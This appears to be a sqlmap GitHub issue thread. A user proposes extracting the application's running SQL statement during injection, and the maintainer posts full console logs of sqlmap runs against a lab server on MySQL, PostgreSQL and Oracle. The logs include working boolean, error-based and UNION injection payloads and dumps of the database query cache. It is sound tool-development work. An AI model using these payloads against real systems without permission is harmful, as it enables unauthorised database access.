Extract SQL Command Feature Request

[dodek]

Hi,
I recently did a little research into ways to extract the SQL statement that the webpage is trying to run via SQL injection and thought it might be a cool feature to add to sqlmap. I published the research here if you want to take a quick look.

http://www.contextis.com/resources/blog/sql-inception-how-select-yourself/

The basic idea was to try and make blind SQL injection less blind especially with larger more complicated SQL statements and also to help with manual testing too. Also it can be interesting to just see the SQL that the website is running and viewing the other SQL statements in the cache can help figure out how the app works.

Feel free to use this in any way you like :)

Thanks,
Aaron

[stamparm]

Against our testing environment:

MySQL:

python sqlmap.py -u "http://172.16.93.131/sqlmap/mysql/get_int.php?id=1" -z "ign,flu,bat,tec=BEU" --sql-query="Select info from information_schema.processlist"
[11:45:20] [WARNING] detected ambiguity (mnemonic 'ign' can be resolved to: 'ignore-401', 'ignore-proxy'). Resolved to shortest of those ('ignore-401')
         _
 ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:45:20

[11:45:20] [INFO] flushing session file
[11:45:20] [INFO] testing connection to the target URL
[11:45:21] [INFO] heuristics detected web page charset 'ascii'
[11:45:21] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:45:22] [INFO] target URL is stable
[11:45:22] [INFO] testing if GET parameter 'id' is dynamic
[11:45:22] [INFO] confirming that GET parameter 'id' is dynamic
[11:45:22] [INFO] GET parameter 'id' is dynamic
[11:45:22] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:45:22] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to XSS attacks
[11:45:22] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[11:45:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:45:22] [WARNING] reflective value(s) found and filtering out
[11:45:22] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[11:45:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[11:45:22] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable 
[11:45:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:45:22] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:45:22] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:45:22] [INFO] target URL appears to have 3 columns in query
[11:45:22] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 16 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 3648=3648

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 AND (SELECT 4021 FROM(SELECT COUNT(*),CONCAT(0x7171717871,(SELECT (ELT(4021=4021,1))),0x7162767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x7171717871,0x6a6f45726b544c4e784f,0x7162767671),NULL,NULL-- 
---
[11:45:22] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
[11:45:22] [INFO] fetching SQL SELECT statement query output: 'Select info from information_schema.processlist'
Select info from information_schema.processlist [2]:
[*]  
[*] SELECT * FROM users WHERE id=__REFLECTED_VALUE__ LIMIT 0, 1

[11:45:22] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/172.16.93.131'

[*] shutting down at 11:45:22

PostgreSQL:

python sqlmap.py -u "http://172.16.93.131/sqlmap/pgsql/get_int.php?id=1" -z "ign,flu,bat,tec=BEU" --sql-query="Select current_query from pg_stat_activity"
[11:45:58] [WARNING] detected ambiguity (mnemonic 'ign' can be resolved to: 'ignore-401', 'ignore-proxy'). Resolved to shortest of those ('ignore-401')
         _
 ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:45:58

[11:45:58] [INFO] flushing session file
[11:45:58] [INFO] testing connection to the target URL
[11:45:58] [INFO] heuristics detected web page charset 'ascii'
[11:45:59] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:46:00] [INFO] target URL is stable
[11:46:00] [INFO] testing if GET parameter 'id' is dynamic
[11:46:00] [INFO] confirming that GET parameter 'id' is dynamic
[11:46:00] [WARNING] GET parameter 'id' does not appear dynamic
[11:46:00] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'PostgreSQL')
[11:46:00] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to XSS attacks
[11:46:00] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] Y
[11:46:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:46:00] [WARNING] reflective value(s) found and filtering out
[11:46:00] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[11:46:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:46:00] [INFO] GET parameter 'id' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable 
[11:46:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:46:00] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:46:00] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:46:00] [INFO] target URL appears to have 3 columns in query
[11:46:00] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 16 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9460=9460

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 2639=CAST((CHR(113)||CHR(120)||CHR(122)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (2639=2639) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(122)||CHR(106)||CHR(113)) AS NUMERIC)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,(CHR(113)||CHR(120)||CHR(122)||CHR(98)||CHR(113))||(CHR(118)||CHR(122)||CHR(102)||CHR(100)||CHR(71)||CHR(77)||CHR(76)||CHR(80)||CHR(99)||CHR(119))||(CHR(113)||CHR(120)||CHR(122)||CHR(106)||CHR(113)),NULL-- 
---
[11:46:00] [INFO] the back-end DBMS is PostgreSQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[11:46:00] [INFO] fetching SQL SELECT statement query output: 'Select current_query from pg_stat_activity'
Select current_query from pg_stat_activity [2]:
[*] <IDLE>
[*] SELECT * FROM users WHERE id=__REFLECTED_VALUE__ OFFSET 0 LIMIT 1

[11:46:00] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/172.16.93.131'

[*] shutting down at 11:46:00

Oracle:

python sqlmap.py -u "http://172.16.93.131/sqlmap/oracle/get_int.php?id=1" -z "ign,flu,bat,tec=BEU" --sql-query="select SQL_TEXT from v$sql"
[11:46:42] [WARNING] detected ambiguity (mnemonic 'ign' can be resolved to: 'ignore-401', 'ignore-proxy'). Resolved to shortest of those ('ignore-401')
         _
 ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:46:42

[11:46:42] [INFO] flushing session file
[11:46:42] [INFO] testing connection to the target URL
[11:46:42] [INFO] heuristics detected web page charset 'ascii'
[11:46:42] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:46:44] [INFO] target URL is stable
[11:46:44] [INFO] testing if GET parameter 'id' is dynamic
[11:46:44] [INFO] confirming that GET parameter 'id' is dynamic
[11:46:44] [INFO] GET parameter 'id' is dynamic
[11:46:44] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'Oracle')
[11:46:44] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'Oracle' extending provided level (1) and risk (1) values? [Y/n] Y
[11:46:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:46:44] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[11:46:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:46:44] [INFO] GET parameter 'id' is 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' injectable 
[11:46:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:46:44] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:46:44] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:46:44] [INFO] target URL appears to have 3 columns in query
[11:46:44] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 17 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9249=9249

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: id=1 AND 6946=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (6946=6946) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113)||CHR(90)||CHR(68)||CHR(118)||CHR(120)||CHR(81)||CHR(78)||CHR(107)||CHR(88)||CHR(79)||CHR(102)||CHR(113)||CHR(118)||CHR(122)||CHR(112)||CHR(113),NULL FROM DUAL-- 
---
[11:46:44] [INFO] the back-end DBMS is Oracle
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
[11:46:44] [INFO] fetching SQL SELECT statement query output: 'select SQL_TEXT from v'
[11:46:44] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[11:46:44] [WARNING] the SQL query provided does not return any output
[11:46:45] [WARNING] the SQL query provided does not return any output
[11:46:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
select SQL_TEXT from v: None
[11:46:45] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/172.16.93.131'

[*] shutting down at 11:46:45

stamparm@Laptop:~/Dropbox/Work/sqlmap$ python sqlmap.py -u "http://172.16.93.131/sqlmap/oracle/get_int.php?id=1" -z "ign,flu,bat,tec=BEU" --sql-query='select SQL_TEXT from v$sql'
[11:47:02] [WARNING] detected ambiguity (mnemonic 'ign' can be resolved to: 'ignore-401', 'ignore-proxy'). Resolved to shortest of those ('ignore-401')
         _
 ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:47:02

[11:47:02] [INFO] flushing session file
[11:47:02] [INFO] testing connection to the target URL
[11:47:03] [INFO] heuristics detected web page charset 'ascii'
[11:47:03] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:47:04] [INFO] target URL is stable
[11:47:04] [INFO] testing if GET parameter 'id' is dynamic
[11:47:04] [INFO] confirming that GET parameter 'id' is dynamic
[11:47:04] [INFO] GET parameter 'id' is dynamic
[11:47:04] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'Oracle')
[11:47:04] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'Oracle' extending provided level (1) and risk (1) values? [Y/n] Y
[11:47:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:47:04] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[11:47:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:47:04] [INFO] GET parameter 'id' is 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' injectable 
[11:47:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:47:04] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:47:04] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:47:04] [INFO] target URL appears to have 3 columns in query
[11:47:04] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 17 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 4132=4132

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: id=1 AND 4302=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (4302=4302) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(98)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,CHR(113)||CHR(120)||CHR(118)||CHR(120)||CHR(113)||CHR(71)||CHR(66)||CHR(118)||CHR(99)||CHR(72)||CHR(122)||CHR(97)||CHR(76)||CHR(74)||CHR(109)||CHR(113)||CHR(122)||CHR(98)||CHR(118)||CHR(113),NULL FROM DUAL-- 
---
[11:47:05] [INFO] the back-end DBMS is Oracle
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
[11:47:05] [INFO] fetching SQL SELECT statement query output: 'select SQL_TEXT from v$sql'
[11:47:05] [WARNING] reflective value(s) found and filtering out
select SQL_TEXT from v$sql [261]:
[*]          select open_mode from v$database
[*]       begin          dbms_rcvman.resetAll;       end;
[*]       declare          vsn  varchar2(20);             begin               vsn := dbms_rcvman.getPackageVersion;               :pkg_vsn:pkg_vsn_i := vsn;               if vsn is not null then                  :pkg_vsnub4 :=                    to_number(substr(vsn,1,2) || substr(vsn,4,2) ||                              substr(vsn,7,2) || nvl(substr(vsn,10,2),'00'));               end if;             end;
[*]       select name, resetlogs_time,              resetlogs_change#,              dbid       into :dbname:dbname_i,            :rlgtime,            :rlgscn,            :fhdbi:fhdbi_i       from v$database
[*]  select u.name, o.name, t.attributes  from sys.type$ t, sys.user$ u, sys.obj$ o   where  o.owner# = u.user#  AND  t.toid = o.oid$   and t.toid = :1 and t.version# = :2 
[*] alter session set NLS_LANGUAGE='ENGLISH' NLS_TERRITORY='UNITED KINGDOM' NLS_CURRENCY='#' NLS_ISO_CURRENCY='UNITED KINGDOM' NLS_NUMERIC_CHARACTERS='.,' NLS_DATE_FORMAT='DD-MON-RR' NLS_DATE_LANGUAGE='ENGLISH' NLS_SORT='BINARY'
[*] ALTER SESSION SET TIME_ZONE='+00:00'
[*] BEGIN  dbms_ha_alerts_prvt.clear_instance_resources(   :dbdomain, :dbuniquename, :instance_name, :event_time);END;
[*] CALL MGMT_ADMIN_DATA.EVALUATE_MGMT_METRICS(:tguid, :mguid, :result)
[*] DECLARE job BINARY_INTEGER := :job;  next_date TIMESTAMP WITH TIME ZONE := :mydate;  broken BOOLEAN := FALSE;  job_name VARCHAR2(30) := :job_name;  job_subname VARCHAR2(30) := :job_subname;  job_owner VARCHAR2(30) := :job_owner;  job_start TIMESTAMP WITH TIME ZONE := :job_start;  window_start TIMESTAMP WITH TIME ZONE := :window_start;  window_end TIMESTAMP WITH TIME ZONE := :window_end;  BEGIN  begin dbms_rlmgr_dr.execschdactions('RLM$SCHDNEGACTION'); end;  :mydate := next_date; IF broken THEN :b := 1; ELSE :b := 0; END IF; END; 
[*] DECLARE job BINARY_INTEGER := :job; next_date DATE := :mydate;  broken BOOLEAN := FALSE; BEGIN EMD_MAINTENANCE.EXECUTE_EM_DBMS_JOB_PROCS(); :mydate := next_date; IF broken THEN :b := 1; ELSE :b := 0; END IF; END; 
[*] delete from "SYS"."ALERT_QT" where rowid = :1
[*] delete from access$ where d_obj#=:1
[*] delete from dependency$ where d_obj#=:1
[*] DELETE FROM MGMT_JOB_EMD_STATUS_QUEUE
[*] DELETE FROM RECENT_RESOURCE_INCARNATIONS$ WHERE DB_UNIQUE_NAME <> :B2 OR DB_DOMAIN <> :B1 
[*] DELETE FROM RECENT_RESOURCE_INCARNATIONS$ WHERE RESOURCE_TYPE = 'INSTANCE' AND RESOURCE_NAME = :B4 AND DB_UNIQUE_NAME = :B3 AND DB_DOMAIN = NVL(:B2 , '==N/A==') AND STARTUP_TIME < SYS_EXTRACT_UTC(:B1 )
[*] delete from smon_scn_time where thread=0 and scn =  (select min(scn) from smon_scn_time where thread=0)
[*] delete from WRI$_ALERT_OUTSTANDING where reason_id = :1 and object_id = :2 and subobject_id = :3 and internal_instance_number = :4 returning owner, object_name, subobject_name, sequence_id, error_instance_id, creation_time into :5, :6, :7, :8, :9, :10
[*] insert into "SYS"."ALERT_QT"  (q_name, msgid, corrid, priority, state, delay, expiration,   time_manager_info, local_order_no, chain_no, enq_time, step_no, enq_uid,   enq_tid, retry_count, exception_qschema, exception_queue, recipient_key,   dequeue_msgid, user_data, sender_name, sender_address, sender_protocol,   user_prop, cscn, dscn)   values (:1, :2, :3, :4, :5, :6, :7, :8, :9, :10, :11, :12, :13, :14, 0, :15,         :16, :17, :18, :19, :20, :21, :22, :23, :24, :25)
[*] insert into access$(d_obj#,order#,columns,types) values (:1,:2,:3,:4)
[*] INSERT INTO MGMT_METRICS_RAW (TARGET_GUID, COLLECTION_TIMESTAMP, METRIC_GUID, KEY_VALUE, VALUE, STRING_VALUE) VALUES (:B5 , :B4 , :B3 , :B2 , :B1 , NULL)
[*] INSERT INTO MGMT_METRICS_RAW (TARGET_GUID, COLLECTION_TIMESTAMP, METRIC_GUID, KEY_VALUE, VALUE, STRING_VALUE) VALUES (:B5 , :B4 , :B3 , :B2 , NULL, :B1 )
[*] INSERT INTO MGMT_STRING_METRIC_HISTORY (TARGET_GUID, KEY_VALUE, COLLECTION_TIMESTAMP, METRIC_GUID, STRING_VALUE) VALUES (:B1 , :B2 , :B3 , :B4 , :B5 )
[*] INSERT INTO MGMT_SYSTEM_PERFORMANCE_LOG (JOB_NAME, TIME, DURATION, MODULE, ACTION, IS_TOTAL, NAME, VALUE, CLIENT_DATA, HOST_URL) VALUES (:B9 , SYSDATE, :B8 , SUBSTR(:B7 , 1, 512), SUBSTR(:B6 ,1,32), :B5 , SUBSTR(:B4 ,1,128), SUBSTR(:B3 ,1,128), SUBSTR(:B2 ,1,128), SUBSTR(:B1 ,1,256))
[*] INSERT INTO RECENT_RESOURCE_INCARNATIONS$ ( RESOURCE_TYPE, RESOURCE_ID, RESOURCE_NAME, DB_UNIQUE_NAME, DB_DOMAIN, INSTANCE_NAME, HOST_NAME, STARTUP_TIME, LOCATION, INCARNATION ) SELECT 'INSTANCE', INSTANCE_NUMBER, INSTANCE_NAME, :B2 , :B1 , INSTANCE_NAME, HOST_NAME, SYS_EXTRACT_UTC( DBMS_HA_ALERTS_PRVT.INSTANCE_STARTUP_TIMESTAMP_TZ(VI.STARTUP_TIME)), HOST_NAME, '==N/A==' FROM V$INSTANCE VI
[*] insert into sys.col_usage$ values (   :objn, :coln,   decode(bitand(:flag,1),0,0,1),   decode(bitand(:flag,2),0,0,1),   decode(bitand(:flag,4),0,0,1),   decode(bitand(:flag,8),0,0,1),   decode(bitand(:flag,16),0,0,1),   decode(bitand(:flag,32),0,0,1),   :time)
[*] insert into sys.mon_mods$ values (:1, :2, :3, :4, :5, :6, :7)
[*] insert into sys.scheduler$_event_log  (log_id, log_date, type#, name, owner, operation, status, user_name,   client_id, guid, additional_info, class_id)   values  (:1, SYSTIMESTAMP,   :2, :3, :4, :5, :6, :7, :8, :9, :10, :11)\x00
[*] insert into sys.scheduler$_job_run_details  (log_id, log_date, req_start_date, start_date, run_duration,   instance_id, session_id, slave_pid, cpu_used, error#, additional_info)   values  (:1, SYSTIMESTAMP, :2, :3, :4, :5, :6, :7,   numtodsinterval(:8/100, 'second'), :9, :10)\x00
[*] INSERT INTO sys.wri$_adv_findings (id, task_id, type, parent, obj_id, impact_msg_id, impact_val, msg_id, more_info_id) VALUES (:1,:2,:3,:4,:5,:6,:7,:8,:9) 
[*] INSERT INTO sys.wri$_adv_message_groups (task_id,id,seq,message#,fac,hdr,lm,nl,p1,p2,p3,p4,p5) VALUES (:1,:2,:3,:4,:5,:6,:7,:8,:9,:10,:11,:12,:13)
[*] insert into wrh$_waitclassmetric_history     (snap_id, dbid, instance_number, wait_class_id,      begin_time, end_time, intsize, group_id,      average_waiter_count, dbtime_in_wait,      time_waited, wait_count)  select      :snap_id, :dbid, :instance_number, wait_id,      begtime, endtime, intsize_csec, groupid,      average_waiter_count, dbtime_in_wait,      time_waited, wait_count  from x$kewmevmv
[*] insert into WRI$_ALERT_HISTORY (sequence_id, reason_id, owner, object_name, subobject_name, reason_argument_1, reason_argument_2, reason_argument_3, reason_argument_4, reason_argument_5, time_suggested, creation_time, action_argument_1, action_argument_2, action_argument_3, action_argument_4, action_argument_5, message_level, hosting_client_id, process_id, host_id, host_nw_addr, instance_name, instance_number, user_id, execution_context_id, error_instance_id, resolution, metric_value) values (:1, :2, :3, :4, :5, :6, :7, :8, :9, :10, :11, :12, :13, :14, :15, :16, :17, :18, :19, :20, :21, :22, :23, :24, :25, :26, :27, :28, :29)
[*] insert into WRI$_ALERT_OUTSTANDING (reason_id, object_id, subobject_id, internal_instance_number, owner, object_name, subobject_name, sequence_id, reason_argument_1, reason_argument_2, reason_argument_3, reason_argument_4, reason_argument_5, time_suggested, creation_time, action_argument_1, action_argument_2, action_argument_3, action_argument_4, action_argument_5, message_level, hosting_client_id, process_id, host_id, host_nw_addr, instance_name, instance_number, user_id, execution_context_id, error_instance_id, context, metric_value) values (:1, :2, :3, :4, :5, :6, :7, :8, :9, :10, :11, :12, :13, :14, :15, :16, :17, :18, :19, :20, :21, :22, :23, :24, :25, :26, :27, :28, :29, :30, :31, :32)
[*] LOCK TABLE RECENT_RESOURCE_INCARNATIONS$ IN EXCLUSIVE MODE
[*] lock table sys.col_usage$ in exclusive mode nowait
[*] lock table sys.mon_mods$ in exclusive mode nowait
[*] select  INSTANCE_NUMBER , INSTANCE_NAME , HOST_NAME , VERSION , STARTUP_TIME , STATUS , PARALLEL , THREAD# , ARCHIVER , LOG_SWITCH_WAIT , LOGINS , SHUTDOWN_PENDING, DATABASE_STATUS, INSTANCE_ROLE, ACTIVE_STATE, BLOCKED from GV$INSTANCE where inst_id = USERENV('Instance')
[*] select  SQL_TEXT , SQL_FULLTEXT , SQL_ID,  SHARABLE_MEM , PERSISTENT_MEM , RUNTIME_MEM , SORTS , LOADED_VERSIONS , OPEN_VERSIONS , USERS_OPENING , FETCHES , EXECUTIONS , PX_SERVERS_EXECUTIONS , END_OF_FETCH_COUNT, USERS_EXECUTING , LOADS , FIRST_LOAD_TIME, INVALIDATIONS, PARSE_CALLS , DISK_READS , DIRECT_WRITES , BUFFER_GETS , APPLICATION_WAIT_TIME, CONCURRENCY_WAIT_TIME, CLUSTER_WAIT_TIME, USER_IO_WAIT_TIME, PLSQL_EXEC_TIME, JAVA_EXEC_TIME, ROWS_PROCESSED , COMMAND_TYPE , OPTIMIZER_MODE , OPTIMIZER_COST, OPTIMIZER_ENV, OPTIMIZER_ENV_HASH_VALUE, PARSING_USER_ID , PARSING_SCHEMA_ID , PARSING_SCHEMA_NAME, KEPT_VERSIONS , ADDRESS , TYPE_CHK_HEAP , HASH_VALUE, OLD_HASH_VALUE, PLAN_HASH_VALUE, CHILD_NUMBER, SERVICE, SERVICE_HASH, MODULE, MODULE_HASH , ACTION , ACTION_HASH ,  SERIALIZABLE_ABORTS , OUTLINE_CATEGORY, CPU_TIME, ELAPSED_TIME, OUTLINE_SID, CHILD_ADDRESS, SQLTYPE, REMOTE, OBJECT_STATUS, LITERAL_HASH_VALUE, LAST_LOAD_TIME, IS_OBSOLETE, CHILD_LATCH, SQL_PROFILE, PROGRAM_ID, PROGRAM_
[*] select  tab.rowid, tab.msgid, tab.corrid, tab.priority, tab.delay,   tab.expiration, tab.retry_count, tab.exception_qschema,   tab.exception_queue, tab.chain_no, tab.local_order_no, tab.enq_time,   tab.time_manager_info, tab.state, tab.enq_tid, tab.step_no,   tab.sender_name, tab.sender_address, tab.sender_protocol,   tab.dequeue_msgid, tab.user_prop, tab.user_data  from "SYS"."ALERT_QT" tab  where msgid = :1
[*] SELECT * FROM scott.users WHERE id=1
[*] SELECT * FROM scott.users WHERE id=1 AND 4132=4132
[*] SELECT * FROM scott.users WHERE id=1 AND 4302=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (4302=4302) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(98)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
[*] SELECT * FROM scott.users WHERE id=1 AND 4306=7777
[*] SELECT * FROM scott.users WHERE id=1 AND 4441=4600
[*] SELECT * FROM scott.users WHERE id=1 AND 4832=7755
[*] SELECT * FROM scott.users WHERE id=1 AND 6946=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (6946=6946) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL)
[*] SELECT * FROM scott.users WHERE id=1 AND 9249=9249
[*] SELECT * FROM scott.users WHERE id=1 AND 9333=1035
[*] SELECT * FROM scott.users WHERE id=1 ORDER BY 1-- 
[*] SELECT * FROM scott.users WHERE id=1 ORDER BY 3-- 
[*] SELECT * FROM scott.users WHERE id=1 UNION ALL SELECT NULL,CHR(113)||CHR(120)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (4475=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4475) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(98)||CHR(118)||CHR(113),NULL FROM DUAL-- 
[*] SELECT * FROM scott.users WHERE id=1 UNION ALL SELECT NULL,CHR(113)||CHR(120)||CHR(118)||CHR(120)||CHR(113)||CHR(71)||CHR(66)||CHR(118)||CHR(99)||CHR(72)||CHR(122)||CHR(97)||CHR(76)||CHR(74)||CHR(109)||CHR(113)||CHR(122)||CHR(98)||CHR(118)||CHR(113),NULL FROM DUAL UNION ALL SELECT NULL,CHR(113)||CHR(120)||CHR(118)||CHR(120)||CHR(113)||CHR(70)||CHR(103)||CHR(68)||CHR(111)||CHR(110)||CHR(110)||CHR(83)||CHR(65)||CHR(105)||CHR(104)||CHR(113)||CHR(122)||CHR(98)||CHR(118)||CHR(113),NULL FROM DUAL-- 
